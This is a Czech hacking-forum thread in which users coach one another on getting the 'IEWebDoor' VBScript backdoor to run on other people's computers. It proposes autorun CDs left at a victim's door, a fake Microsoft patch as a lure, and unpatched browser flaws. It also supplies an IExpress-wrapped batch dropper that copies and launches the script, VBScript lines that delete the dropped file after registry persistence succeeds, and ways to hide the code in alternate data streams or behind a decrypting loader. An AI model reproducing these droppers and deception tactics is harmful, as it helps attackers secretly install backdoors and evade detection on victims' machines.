Samospusteni

HackForum

Samospusteni#
Dobrý den,chtěl jsem se zeptat,jestli někdo neznáte způsob nebo script ,jak docílit toho,aby se například ten IEWebDoor spustil hned,když ho uživatel dostane do svého počítače.Nemusel bych tedy čekat na to,až uživatel script spustí.Což se často ani nestane.Na googlu jsem nic o samospuštění kromě autorun nenašel,tak se obracím na vás.Nešlo by to třeba tím autorunem?

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 12:43
re: Samospusteni#
Autorunem by to samozřejmě šlo. Vypálíš CD s nějakým obsahem + backdoor, položíš to vedle jeho dveří, nebo mu to pošleš poštou a je to :)
Když chceš docílit automatického spuštění například po odeslání mailu nebo při návštěvě www stránky, musíš si zjistit nějakou chybu, kterou nemá uživatel zazáplatovánu ve webovém browseru nebo v mailovém klientu. Toto ale už není tak jednoduché. Musíš si o uživatelově systému zjistit dost informací a to nemluvím o tom, že pokud se jedná o známou chybu, kterou chceš využít, pak musí být hodně čerstvá a nebo musí být uživatel děsně IT negramotnej, aby nestahoval záplaty.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 13:02
re: Samospusteni#
Myslím, že se dá použít docela dobře sociotechnika - co třeba záplata od Microsoftu?
(odpovědět)
Fisi | E-mail13.7.2006 13:49
re: Samospusteni#
tím chci říct že uživatel to spustí sám;)
jenom se chci zeptat:jak muzu zasifrovat ten soubor *.vbs aby při zobrazení v texťáku nebyl vidět zdroják?
(odpovědět)
Fisi | E-mail13.7.2006 13:51
re: Samospusteni#
zabal to pomoci iexpress a dej tam spousteci cmd script:
@echo off
copy IEwebDoor.vbs "c:\bootinfo.vbs"
start c:\bootinfo.vbs
del c:\bootinfo.vbs
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797620.7.2006 9:20
re: Samospusteni#
zdravim potrebuji vedet nejake prikazy do vbs napr automaticke spusteni atd... dekuji a nejlepe nejakou stranku ohledne techto prikazu jsem zacatecnik
(odpovědět)
Strup | 85.71.69.*30.7.2007 17:46
re: Samospusteni#
Jo a ještě ten script s tim souborem od iewebdoor zabal pomoci iexpress a jako instalacni soubor nastav nazev toho scriptu
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797620.7.2006 9:22
re: Samospusteni#
Fisi: Zašifrovat to bohužel nemůžeš, musel bys to napsat v jiném jazyku, ale nejspíš by se to dalo hodit do ADS a tím to dostatečně skrýt. Pokud ti ale jde o to, aby to nemohl v texťáku otevřít někdo, komu to teprve podstrkuješ, tak by bylo možné vytvořit program, který by sloužil pouze jako zavaděč, který by rozšifroval zašifrovaný obsah IEwebDOORu a uložil jej na HDD objěti. Nemělo by to být nic těžkého, pár řádků kódu...

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 14:15
re: Samospusteni#
.cCuMiNn. myslis ze bych mohl na konec skriptu umistit del vbscript.vbs ? ze by se po spusteni toho scriptu ten script sam vymazal? zustala by tam pak v jeho pocitaci jen ta kopie ze?

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 14:54
re: Samospusteni#
No já si to nemyslim, protože ta kopie je ten samej soubor a má stejnej kód. Tím pádem by se smazala po spuštění i kopie :(
(odpovědět)
()Suprer() | E-mail | ICQ 273-308-79113.7.2006 15:03
re: Samospusteni#
Darth: Jj, toto by určitě šlo. Jen bys to neměl dávat na konec toho scriptu, ale spíše před návrat z funkce bStartReg(). Chtělo by to tam umístit, tento řádek kódu:
objFso.DeleteFile strJmenoSoubor, True

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 15:07
re: Samospusteni#
Function bStartReg()
bStartReg = true
objFso.DeleteFile strIEwebDOOR, True
End function

zkraceno...asi takhle to tam dat? ja vbs neumim sry tak se radsi ptam...

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:22
re: Samospusteni#
Darth: Vlož to před tento řádek:
If Err.Number = 0 Then WScript.Quit
ale k vymazání dojde, pouze pokud zahnízdění proběhlo bez problému. Pokud se nepodaří vytvořit kopii a záznam v registrech, tak se to nevymaže, muselo by se to umístit i na jiná místa ve scriptu.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 15:33
re: Samospusteni#
JJ takze je to vlastne i takova kontrola jestli doslo ke spravnemu behu scriptu.Pokud se smaze muzu se radovat pokud ne muzu hledat chybu...to se taky hodi...dik moc ;) btw rulezzni projekt fakt smekam je to super ;)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:37
re: Samospusteni#
ještě takový malý doplněk : je toto dobre? strSranda ? ten script se jmenuje Sranda.vbs .Nema se tam zadavat pripona .vbs nebo tak? se radsi ptam nez bych neco udelal spatne :)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:39
re: Samospusteni#
Darth: Vlastně ještě oprava, ten řádek
If Err.Number = 0 Then WScript.Quit

nahraď tímto kódem:
If Err.Number = 0
objFso.DeleteFile strIEwebDOOR, True
WScript.Quit
End If

Toto už by mělo být bez problému...

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 15:42
re: Samospusteni#
Nemel bych vymazat i to predchozi End if ? Je tam

If Err.Number = 0 Then WScript.Quit
End If

Kdyz si ten prikaz napsal i s tim End If tak ten s tim starym prikazem bych mel taky smazat ze?

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:47
re: Samospusteni#
Darth: Ne, ten tam nechej - budou tam dva za sebou. Ten End, o kterém se zmiňuješ patří k jinému If - podle zarovnání uhodneš k jakému.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP13.7.2006 15:52
re: Samospusteni#
A jeste jedna vec...jak poznam ze se mi uz provedl prikaz ktery sem zadal na klienta?pustil sem si za ucelem zkouseni ten script na svem pc..ted sem zadal autodestroy dal ulozit a nic se nedeje..interval mam nastaveny na jednu minutu...jak poznam ze se prikaz vykonal?

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:56
re: Samospusteni#
WshShell.Run strCesta, 0, false
objFso.DeleteFile strIEwebDOOR, True
If Err.Number = 0
objFso.DeleteFile strSranda, True
WScript.Quit
End If
End If
bStartReg = true
End function

takto to nyni vypada...

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:58
re: Samospusteni#
druhy radek uz tam neni omlouvam se :)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 15:58
re: Samospusteni#
Vse uz je vyreseno omlouvam se za spam :)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 16:01
re: Samospusteni#
Vse probehlo v poradku ale script se nevymazal :( btw za tim if to chtelo jeste Then

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 16:04
re: Samospusteni#
Darth: jak tam máš strSranda, tak to vrať zpět na strJmenoSoubor. Nevšiml jsem si toho, že jsi to přejmenoval na strIEwebDOOR :)
(odpovědět)
.cCuMiNn,13.7.2006 17:22
re: Samospusteni#
.cCuMiNn. je boreeeeeeec ono to fungujeee :D respekt ;)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail13.7.2006 17:54
re: Samospusteni#
Já to mám ve svém skriptu takhle:

fx_soubor = WScript.ScriptFullName
fx_adr = "C:\WINDOWS\twain_32.vbs"
Set fso = CreateObject("Scripting.FileSystemObject")
if fx_soubor <> adr_adr then
fso.DeleteFile(fx_soubor)
End If
(odpovědět)
MAXi_CRASH_Net | E-mail | ICQ 20140928430.7.2007 23:34
re: Samospusteni#
prosím vás napište mi nějaké příkazy pls jsem začátečník
(odpovědět)
Mareelsaan | 213.168.183.*2.1.2008 16:58

Zpět
 
 
 

 
BBCode